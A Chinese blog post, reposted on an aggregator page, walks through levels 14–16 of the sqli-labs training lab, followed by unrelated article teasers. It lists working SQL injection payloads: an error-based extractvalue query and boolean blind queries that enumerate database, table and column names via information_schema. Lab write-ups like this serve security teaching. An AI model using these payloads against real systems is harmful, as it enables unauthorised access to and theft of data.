sqli-labs通关（十四）（十五）（十六）

news2024/9/27 17:25:58

第十四关

输入1",出现如下报错信息，告诉我们要双引号闭合

所以我们输入

1" or 1=1#

没有任何返回信息，这一关和十三关一样，利用报错信息爆出数据

1" and extractvalue(1,concat(0x7e,(select database())))#

第十五关

输入1'是这样的

输入1' or 1=1#是这样的，所以这是一个布尔盲注

猜库名长度

1' or length((select database()))=8#

逐一猜库名，对应ASCII码表

1' or ascii(substr((select database()),1,1))=115#

猜表名长度

1' or length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29#

逐一猜表名

1' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=101#

猜列名长度

1' or length((select group_concat(column_name) from information_schema.columns where table_name='users'))=29#

第十六关

这一关跟第十五个的区别就是闭合是双引号和一个括号，其他跟第十五关一样

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/504560.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

【软件测试】第二章黑盒测试

【软件测试】第二章黑盒测试

系列文章目录文章目录系列文章目录前言第二章黑盒测试2.1 等价类划分2.2 边界值分析2.3 因果图法2.4 判定表驱动2.5 正交试验法2.6 其他黑盒测试方法2.7 功能性测试总结总结前言第二章黑盒测试黑盒测试：功能测试或数据驱动测试测试对象：需求规格…

阅读更多...

发布会实录｜悠易科技CTO李旸：洞察新引擎品牌新增长

发布会实录｜悠易科技CTO李旸：洞察新引擎品牌新增长

4月26日，悠易科技LinkFlow对其核心的 “洞察”产品能力进行了升级。作为开场嘉宾，悠易科技CTO李旸做了题为《洞察新引擎品牌新增长》的精彩分享，为我们阐释了本次发布升级的背景和出发点，帮助我们更好地理解LinkFlow CDP如何借助…

阅读更多...

【postgresql】一些函数记录

【postgresql】一些函数记录

1、coalesce函数：合并，coalesce(值1，值2，值3……)，返回第一个不为null的值； 2、coalesce和ifnull的区别，ifnull只有两个参数，返回第一个不为null的参数 3、if和casewhen的区别&…

阅读更多...

信息安全评估

信息安全评估

安全评估基础概念、作用、安全评估标准安全评估基本概念什么是安全评估针对潜在影响资产正常执行其职能的行为产生干扰或者破坏的因素进行识别、评价的过程对安全评估的理解狭义指对一个具有特定功能的工作系统中固有的或潜在的危险及其严重程度所进行的分析与评估&a…

阅读更多...

通用路由封装协议GRE

通用路由封装协议GRE

通用路由封装协议原理通用路由封装协议GRE（Generic Routing Encapsulation）可以对某些网络层协议（如IPX、ATM、IPv6、AppleTalk等）的数据报文进行封装，使这些被封装的数据报文能够在另一个网络层协议（如IPv4）中传输。 GRE提供了将一种协议的报文封装在另一种协议报文中…

阅读更多...

国产AI大模型酣战，科大讯飞打响“智慧涌现”第一枪

国产AI大模型酣战，科大讯飞打响“智慧涌现”第一枪

配图来自Canva可画 ChatGPT问世半年之久，人与AI“你问我答”的游戏热度不降反升，AI大模型技术需求也随之水涨船高，成为科技企业重点关注的方向。在海外，OpenAI、谷歌、微软的AI大模型战争正打得火热；在国内&#xf…

阅读更多...

PowerShell系列（二）：PowerShell和Python之间的差异介绍

PowerShell系列（二）：PowerShell和Python之间的差异介绍

目录 1、Python定义 2、Python用途 4、PowerShell用途 5、PowerShell和Python对比 5.1 共同点 5.2 不同点 6、总结今天给大家聊聊PowerShell和Python之间有哪些共同之处，各自有哪些优势，希望对运维的朋友了解两种语言能提供一些有用的信息。 1、Python定…

阅读更多...

Unit 为啥还能当函数参数？面向实用的 Kotlin Unit 详解

Unit 为啥还能当函数参数？面向实用的 Kotlin Unit 详解

视频先行下面是视频内容的脚本文案原稿分享。文案原稿很多从 Java 转到 Kotlin 的人都会有一个疑惑：为什么 Kotlin 没有沿用 Java 的 void 关键字，而要引入这个叫 Unit 的新东西？ // Java public void sayHello() {System.out.println(&qu…

阅读更多...

Unity大面积草地渲染——2、草地的动态交互

Unity大面积草地渲染——2、草地的动态交互

大家好，我是阿赵。这里继续讲大面积草地渲染的第二个部分，草地动态交互。这里主要有风吹效果和球体碰撞效果2种。一、风吹效果 Unity使用shader控制草的渲染和动画风吹动草的效果，主要还是使用顶点程序来控制顶点的偏移回顾一下之前的基…

阅读更多...

全方位揭秘！大数据从0到1的完美落地之Shuffle和调优

全方位揭秘！大数据从0到1的完美落地之Shuffle和调优

MapReduce高级 shuffle阶段概述 MapReduce会确保每个reducer的输入都是按键排序的。从map方法输出数据开始、到作为输入数据传给reduce方法的过程称为shuffle。在此，我们将学习shuffle是如何工作的，因为它有助于我们理解工作机制（如果需要…

阅读更多...

MYSQL数据库进阶多表查询，MYSQL数据库主键和外键

MYSQL数据库进阶多表查询，MYSQL数据库主键和外键

目录友情提醒第一章：MYSQL数据库多表主键和外键1）外键介绍（FOREIGN KEY）2）外键约束作用2）三种情况下添加外键约束①一对一关系②一对多关系多对多关系 4）删除外键约束第二章：MYSQL…

阅读更多...

配置您的 Web 服务器以包含 X-Frame-Options 标头

配置您的 Web 服务器以包含 X-Frame-Options 标头

介绍 X-Frame-Options HTTP 响应头是用来给浏览器指示允许一个页面可否在 <frame>, </iframe> 或者 <object> 中展现的标记。网站可以使用此功能，来确保自己网站的内容没有被嵌套到别人的网站中去，也从而避免了点击劫持 (clickjackin…

阅读更多...

mysql数据库之备份和恢复

mysql数据库之备份和恢复

1.数据备份的重要性备份的主要目的是灾难恢复。在生产环境中，数据的安全性至关重要。任何数据的丢失都可能产生严重的后果。造成数据丢失的原因： 程序错误人为,操作错误,运算错误,磁盘故障灾难（如火灾、地震）和盗窃. 2.数据…

阅读更多...

Python爬虫入门之爬虫解析提取数据的四种方法

Python爬虫入门之爬虫解析提取数据的四种方法

本文主要介绍了Python爬虫入门之爬虫解析提取数据的四种方法，通过具体的内容向大家展现，希望对大家Python爬虫的学习有所帮助。基础爬虫的固定模式笔者这里所谈的基础爬虫，指的是不需要处理像异步加载、验证码、代理等高阶爬虫技术的爬虫…

阅读更多...

Vscode开发第一个Vue+Element Plus示例

Vscode开发第一个Vue+Element Plus示例

Vscode开发第一个VueElement Plus示例目前，前端开发工具非常多，如Webstorm、Atom、HBuilder、Visual Studio Code、Sublime Text、Notepad等。对于有经验的开发者来说，使用哪一款工具都可以。笔者习惯使用Visual Studio Code。 Visual St…

阅读更多...

什么是镜像？阿里云服务器镜像是什么？镜像怎么选？

什么是镜像？阿里云服务器镜像是什么？镜像怎么选？

阿里云服务器镜像就是云服务器的装机盘，镜像是为云服务器安装操作系统的。阿里云镜像分为类型分为公共镜像、自定义镜像、共享镜像、云市场镜像和社区镜像，如下图： 目录什么是镜像？ 镜像种类说明公共镜像自定义镜像共享…

阅读更多...

【HarmonyOS】轻量级智能穿戴应用如何在页面中实现数据传递与全局变量的使用

【HarmonyOS】轻量级智能穿戴应用如何在页面中实现数据传递与全局变量的使用

【关键词】轻量级智能穿戴、LiteWearable、数据传递、全局变量【问题描述】开发轻量级智能穿戴LiteWearable应用，在app.js中定义全局变量，在页面中通过this.$app.$def.xxx获取时，报错TypeError: Cannot read property $def of undefined…

阅读更多...

FlinkTableAPI与SQL编程实战

FlinkTableAPI与SQL编程实战

FlinkTableAPI与SQL编程实战接下来我们一起来进入到FlinkSQL的编码实战当中，通过代码来实现FlinkSQL的编码开发 1、Flink TableAPI实践 1.1、创建Maven工程并添加以jar包坐标依赖 <properties><maven.compiler.source>8</maven.compiler.source…

阅读更多...

Spring Redis 启用TLS配置支持(踩坑解决)

Spring Redis 启用TLS配置支持(踩坑解决)

由于线上Redis要启用TLS,搜遍了google百度也没一个标准的解决方案,要不这个方法没有,要不那个类找不到...要不就是配置了还是一直连不上redis.... 本文基于 spring-data-redis-2.1.9.RELEASE 版本来提供一个解决方案: 1.运维那边提供过来三个文件,分别是redis.crt redis.key …

阅读更多...

设计模式 -- 解释器模式

设计模式 -- 解释器模式

前言月是一轮明镜,晶莹剔透,代表着一张白纸(啥也不懂) 央是一片海洋,海乃百川,代表着一块海绵(吸纳万物) 泽是一柄利剑,千锤百炼,代表着千百锤炼(输入输出) 月央泽,学习的一种过程,从白纸->吸收各种知识->不断输入输出变成自己的内容希望大家一起坚持这个过程,也同…

阅读更多...

推荐文章

最新文章